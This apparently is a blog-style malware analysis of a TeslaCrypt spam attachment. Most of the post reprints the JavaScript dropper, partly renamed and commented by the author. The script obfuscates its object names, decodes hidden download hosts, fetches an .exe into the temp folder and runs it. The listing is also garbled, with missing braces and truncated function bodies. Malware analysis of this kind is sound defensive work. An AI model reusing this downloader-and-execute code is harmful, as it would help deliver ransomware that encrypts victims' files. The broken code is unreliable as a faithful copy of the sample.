Analysis of a TeslaCrypt spam attachment
Got this yesterday in my spam folder. After working through the js-in-zip attachment beneath, I uploaded it to virustotal and got the classification of TeslaCrypt for the js and the actual downloaded binary.
Virustotal results
JS Walkthrough
functions with a readable name were, surprise, renamed by me.
function runScript(GJaRFJrtZko) {
var script_shell = WScript.CreateObject("Wscript.Shell");
script_shell.Run(GJaRFJrtZko, 0x1, 0x0);
function getTempPath(PtUAL, LlFXs, FlysN) {
var mkLge = "NdGVLQ Bpp pt.Shell bllEtPp Scri".split(" ");
var shell = ((1) ? "W" + mkLge[4] : "") + mkLge[2];
var pt = WScript.CreateObject(shell);
var Gk = "%TEMP%\\";
return pt.ExpandEnvironmentStrings(Gk);
function getFileSystemObject() {
var xAcDuWW = "ipting";
var grQibGokBt = "ile";
var xJpUs = "System";
return "Sc" + "r" + xAcDuWW + ".F" + grQibGokBt + xJpUs + "Obj" + "ect";
//COH: return Scripting.FileSystemObject
function eWoi(imumB) {
return WScript.CreateObject(imumB);
function BCqs(tiLfc, OztrY) {
function DKdw(ReLQG) {;
function kVOM(OtVRo, bQfrW) {
OtVRo.saveToFile(bQfrW, 967 - 965);
function qdXC(NJfpu, eKPkH, suJDl) {, eKPkH, false);
function eaom(RCxQE) {
if (RCxQE == 975 - 775) {
return true;
} else {
return false;
function DGGa(ugtoW) {
if (ugtoW > 170089 - 579) { //COH: 169510
return true;
} else {
return false;
//COH given the string scrambled, return a string that only contains the
// characters which were at odd indices
function zoYB(scrambled) {
var ret = "";
for (j = 0; j < scrambled.length; j++)
if (j % 2 != 0) {
ret += scrambled.substr(j, 1);
return ret;
function aPJG(Kgoie) {
function muxg(TIMdT) {
return TIMdT.status;
var yQ = "0tyhNi6szivsGiWtQsqqQqx.Uc7owmo/T6N9L.reWxxej?l 4omhriEysodu1nBg1bzutydf8fi.IcDo9mh/x6J9t.MeLxaek?l M?x d?f I?";
var m = zoYB(yQ).split(" ");
var HnS = getTempPath("qQHr", "QWyZf", "lMxsrd");
var lnR = new ActiveXObject(getFileSystemObject());
var PAfC = HnS + "gCQQtMh\\";
try {
} catch (Nxfyoh) {};
var Cdk = "2.XMLH";
var PVo = (Cdk + "TTP" + " qrdKixY yufRR XML ream St tpRdoTVk AD ZPRWRnX OD").split(" ");
var ua = true,
Laak = PVo[7] + "" + PVo[9];
var lo = eWoi("MS" + PVo[3] + (525261, PVo[0]));
var CJf = eWoi(Laak + "B." + PVo[5] + (689665, PVo[4]));
var VWV = 0;
var K = 1;
var TnYmoIC = 833555;
var O = VWV;
while (true) {
if (O >= m.length) {
//COH around here, it assembles the http ajax get request.
var ap = 0;
var xzS = ("ht" + " DBUIFTI tp kDeqN RHNqiQAB :// laYRvLL .exe GET").split(" ");
try {
qdXC(lo, xzS[0] + xzS[2] + xzS[5] + m[O] + K, "GET");
if (eaom(muxg(lo))) {
CJf.type = 1;
BCqs(CJf, lo.responseBody);
if (DGGa(CJf.size)) {
ap = 1;
CJf.position = 0;
kVOM(CJf, /*EAa982l7jX*/ PAfC /*dub829fDxZ*/ + TnYmoIC + xzS[7]);
try {
if (((new Date()) > 0, 793708888)) {
runScript(PAfC + TnYmoIC + /*KEKW17I1vu*/ xzS[7] /*nexd42SjGg*/ );
} catch (Ee) {};
if (ap == 1) {
VWV = O;
} catch (Ee) {};
URL was https://<CENSORED>